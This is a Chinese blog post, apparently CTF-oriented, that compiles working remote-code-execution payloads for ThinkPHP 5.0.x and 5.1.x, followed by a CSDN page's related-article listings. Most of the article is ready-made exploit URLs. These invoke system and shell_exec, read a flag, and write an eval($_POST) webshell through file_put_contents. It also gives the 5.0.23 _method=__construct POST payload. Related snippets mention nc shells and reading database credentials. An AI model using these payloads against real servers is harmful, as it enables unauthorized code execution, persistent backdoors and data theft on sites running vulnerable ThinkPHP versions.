Thinkphp框架漏洞payload整合

最新推荐文章于 2024-05-12 15:31:12 发布
最新推荐文章于 2024-05-12 15:31:12 发布
阅读量2.2k 收藏 4
点赞数 1
分类专栏: Web安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/124097929
版权

PS:针对不同的情况有些payload可能不适用 可以都尝试尝试 一定要自己审计理解原理

部分payload来源以及合集来源:

​​​​​​ThinkPHP漏洞复现_半盏时光、旧梦悠长的博客-CSDN博客_thinkphp复现

深入学习理解可以参考如上的链接地址

  • Thinkphp 5.0.5-5.0.22  Thinkphp 5.1.0-5.1.30 远程代码执行漏洞(5.0.20最适用)

payload如下:(这是执行system函数的payload)

 在index.php后把响应内容作为参数GET提交即可

http://111.200.241.244:51358/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
http://111.200.241.244:51358/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "*flag*"
http://111.200.241.244:51358/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat ../../../flag

用于写入shell的payload  

此时调用的函数是file_put_contents  写入一句话木马到www根目录下的zxc1.php

// POST内的可以更改
http://111.200.241.244:51809/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=%3C?php%20@eval($_POST[a]);?%3E

也可以借助函数shell_exec的payload

// 命令"id"可更改
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=whoami

 也可以直接构造phpinfo的界面

http://111.200.241.244:51809/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` and it'll execute the phpinfo:

其实可以利用的函数和功能很多 所以核心是理解漏洞产生的代码原理

  • Thinkphp 5.0.x-5.0.23 远程代码执行漏洞 (主要是5.0.23)

利用方式:

在index.php?a=captcha界面 通过burp抓包 将提交方式修改为POST 在包中最后增加如下一句话即可  可以直接访问index界面 在包中顺带修改url请求地址

如下修改

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

有些环境没有办法测试成功 所以需要自行理解代码分析

 

Simon_Smith
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5433
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
php构造payload,Thinkphp远程代码执行 payload汇总
weixin_39837867的博客
03-25 1192
Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/think...
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 5185
ThinkPHP漏洞整理
ThinkPHP5 5.0.20 远程代码执行漏洞
weixin_51387754的博客
01-02 1562
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞漏洞复现 运行ThinkPHP 5.0.20版本: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。 一.进行url拼接可看到phpinfo页面 http://127.0.0.1:8080/index.php?s=/Index/
2024年网络安全最新寒假学习第11天--中间件漏洞--vulhub--thinkphp全系列(1),2024年最新这些知识你必须拿下
最新发布
2401_84132565的博客
05-12 277
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3775
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 981
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8189
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkPHP框架整合tcpdf插件操作示例
10-18
主要介绍了thinkPHP框架整合tcpdf插件操作,结合实例形式较为详细的分析了thinkPHP框架整合tcpdf插件的具体步骤、相关操作技巧与注意事项,需要的朋友可以参考下
thinkphp漏洞检测工具
06-06
2. **漏洞扫描**:运行工具后,它会自动遍历指定的URL,检查ThinkPHP框架中的常见漏洞。这个过程可能需要一些时间,因为工具会尝试各种可能的攻击向量。 3. **结果分析**:扫描完成后,工具会生成一份报告,列明...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
ThinkPHP框架整合支付宝支付功能图文教程
10-17
在本教程中,我们将探讨如何在ThinkPHP框架整合支付宝支付功能,这主要涉及手机网站支付的实现。首先,我们需要了解接入配置的步骤: 1. **创建应用并获取APPID**: 这是第一步,你需要在支付宝开放平台上注册并...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
XCTF篇:Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞复现
小明师傅博客
06-21 1230
3.php_rce 感觉是让我找ThinkPHP V5的漏洞?? 但我连ThinkPHP V5是什么都不知道== 对我这小白一点也不友好 搜索发现框架和cms的区别 框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西. 而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住. 两者的优缺点是: 框架相对比较灵
Thinkphp3全漏洞分析
灰太的表格的博客
01-23 6017
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 6994
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
框架、组件漏洞系列5:tthinkPhp漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-07 3967
一、ThinkPHP简介 基础介绍: ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。 近期发布历史: 2015年12月11日,ThinkPHP 5.0 Beta 发布; 2017年02.
Thinkphp5.0.20漏洞复现
Amateur
09-13 2394
thinkphp5.0.20漏洞复现 本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 漏洞描述:ThinkPHP5.0在核心代码中实现了表单请求类型伪装的功能,该功能利用$_POST['_method']变量来传递真实的请求方法,当攻击者设置$_POST['_method']=__construct时,Request类的method方法便会将该类的变量进行覆盖,攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时
think php防一句话,PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
weixin_42328834的博客
03-16 314
';ini_set('memory_limit','2048M');echo "----------------------------------------------[*]HakeTeam PHP Website Backup Shell V1.0 Beta[*]Forum:http://www.hake.cc[*]isosky's Blog:www.nbst.org------------...
ThinkPHP框架整合极光推送DEMO
05-17
以下是基于ThinkPHP框架整合极光推送的示例代码: 1. 安装JPush SDK 使用composer安装JPush SDK: ``` composer require jpush/jpush ``` 2. 配置JPush 在ThinkPHP框架中,可以将JPush的配置信息写入到config目录下的jpush.php文件中,示例代码如下: ```php return [ 'app_key' => 'YOUR_APP_KEY', 'master_secret' => 'YOUR_MASTER_SECRET', ]; ``` 3. 创建JPushService类 在app/service目录下创建JPushService类,该类用于封装极光推送的相关操作。 ```php <?php namespace app\service; use JPush\Client as JPush; class JPushService { protected $jpush; public function __construct() { $config = config('jpush'); $this->jpush = new JPush($config['app_key'], $config['master_secret']); } // 发送通知 public function sendNotification($title, $content, $extras = [], $audience = 'all') { $notification = [ 'title' => $title, 'alert' => $content, ]; $message = [ 'title' => $title, 'msg_content' => $content, 'extras' => $extras, ]; $options = [ 'apns_production' => false, ]; $response = $this->jpush->push() ->setPlatform(['ios', 'android']) ->setAudience($audience) ->setNotification($notification) ->setMessage($message) ->setOptions($options) ->send(); return $response; } } ``` 4. 使用JPushService类发送推送 在控制器中使用JPushService类发送推送,示例代码如下: ```php <?php namespace app\controller; use app\service\JPushService; class PushController { public function send() { $title = '测试推送'; $content = '这是一条测试推送'; $extras = ['key1' => 'value1', 'key2' => 'value2']; $jpushService = new JPushService(); $response = $jpushService->sendNotification($title, $content, $extras); if ($response['http_code'] === 200) { return json(['code' => 0, 'message' => '推送成功']); } else { return json(['code' => -1, 'message' => '推送失败']); } } } ``` 以上就是基于ThinkPHP框架整合极光推送的示例代码。需要注意的是,示例代码中使用了JPush的免费版服务,如果需要使用更高级别的服务,需要进行相应的付费。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值